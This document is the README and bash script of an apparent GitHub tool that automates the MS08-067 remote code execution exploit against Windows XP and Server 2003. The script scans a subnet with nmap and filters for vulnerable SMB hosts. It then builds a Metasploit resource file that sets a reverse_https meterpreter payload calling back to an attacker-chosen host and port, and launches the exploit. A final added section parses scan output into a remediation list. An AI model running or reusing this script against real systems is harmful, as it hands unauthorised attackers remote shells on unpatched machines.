ms08-067 Remote Code Execution Automation

Microsoft Security Bulletin on the vulnerability.

A script that automates discovery and exploitation of the ms08-067 remote code execution vulnerability on Windows XP.

Setup
chmod +x ms08-67auto.sh
./ms08-67auto.sh

What It Does
Prompts for an IP and subnet for nmap to scan
nmap fingerprints the OS of each host and scans ports 139 and 445
grep filters the results down to Windows XP or Server 2003 hosts
Prints the results and asks you to confirm that you want to attack
Gathers the RHOST, RPORT, LHOST and LPORT values for a Metasploit rc file
Opens the created rc file in Metasploit
Run exploit -j to begin

#!/bin/bash
# Ask for the range to scan
read -p $'\e[1;32mEnter the ip and subnet ex. 10.0.0.0/24:\e[0m ' ipsubnet
echo -e "\e[1;31mScanning for ports 445 and 139\e[m"
# OS detection (-O) needs root, hence sudo
scan=$(sudo nmap "$ipsubnet" -O -p 445,139)
# Keep only hosts with an open SMB port that fingerprint as Windows XP or Server 2003
ports=$(echo "$scan" | grep -E -B 3 -A 7 '445/tcp open|139/tcp open' | grep -E -B 8 'Microsoft Windows XP|Microsoft Windows Server 2003')
echo "$ports"
#echo $scan
read -p 'Is there a target to attack? Press y:' attack
if [ "$attack" = "y" ]; then
    read -p $'\e[1;31mTarget IP address:\e[m' rhost
    read -p $'\e[1;31mWhich port is the service running on?:\e[m' rport
    read -p $'\e[1;31mWhich ip would you like to connect back to?:\e[m' lhost
    read -p $'\e[1;31mWhich port would you like to connect back on?:\e[m' lport
    sudo service postgresql start
    # Write the Metasploit resource file from the collected values
    echo -e "use exploit/windows/smb/ms08_067_netapi\nset RHOST $rhost\nset RPORT $rport\nset PAYLOAD windows/meterpreter/reverse_https\nset LHOST $lhost\nset LPORT $lport\nset ExitOnSession false" > windowsxp.rc
    msfconsole -q -r windowsxp.rc
else
    exit
fi
# 445 and 139

https://github.com/n00shE/ms08-067automation
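
The discovery step above relies on fixed grep context windows (-B 3 -A 7, then -B 8), which can pull in lines from a neighbouring host when nmap prints more or fewer lines per host. As an added example (not part of the original script or repository), here is the same filter written as a per-host awk parser that produces an inventory of hosts still needing the ms08-067 patch; the function names and the sample scan output are constructed for illustration.

```shell
#!/bin/bash
# Added example, not part of ms08-67auto.sh: list legacy SMB hosts for remediation.

# Constructed sample of `nmap -O -p 445,139` output (documentation addresses).
sample_scan() {
cat <<'EOF'
Nmap scan report for 192.0.2.10
Host is up (0.00040s latency).
PORT    STATE  SERVICE
139/tcp open   netbios-ssn
445/tcp open   microsoft-ds
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3

Nmap scan report for fileserver.example (192.0.2.20)
Host is up (0.00051s latency).
PORT    STATE  SERVICE
139/tcp closed netbios-ssn
445/tcp open   microsoft-ds
Running: Microsoft Windows 10
OS details: Microsoft Windows 10 1709

Nmap scan report for 192.0.2.30
Host is up (0.00047s latency).
PORT    STATE    SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
Running: Microsoft Windows 2003
OS details: Microsoft Windows Server 2003 SP2
EOF
}

# Reads nmap normal output on stdin; prints "ip<TAB>open ports<TAB>OS" for each
# host that has 139 or 445 open AND fingerprints as Windows XP / Server 2003.
legacy_smb_hosts() {
  awk '
    function emit() { if (ip != "" && ports != "" && os != "") print ip "\t" ports "\t" os }
    /^Nmap scan report for / {
      emit(); ip = $NF; gsub(/[()]/, "", ip); ports = ""; os = ""; next
    }
    /^(139|445)\/tcp[ \t]+open[ \t]/ {
      split($1, p, "/"); ports = (ports == "" ? p[1] : ports "," p[1])
    }
    /^(Running|OS details): .*Windows (XP|Server 2003|2003)/ {
      os = $0; sub(/^[^:]*: /, "", os)
    }
    END { emit() }
  '
}

sample_scan | legacy_smb_hosts
```

State is reset at every "Nmap scan report for" line, so a host with filtered SMB ports or a modern OS never inherits a match from the host printed before it.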
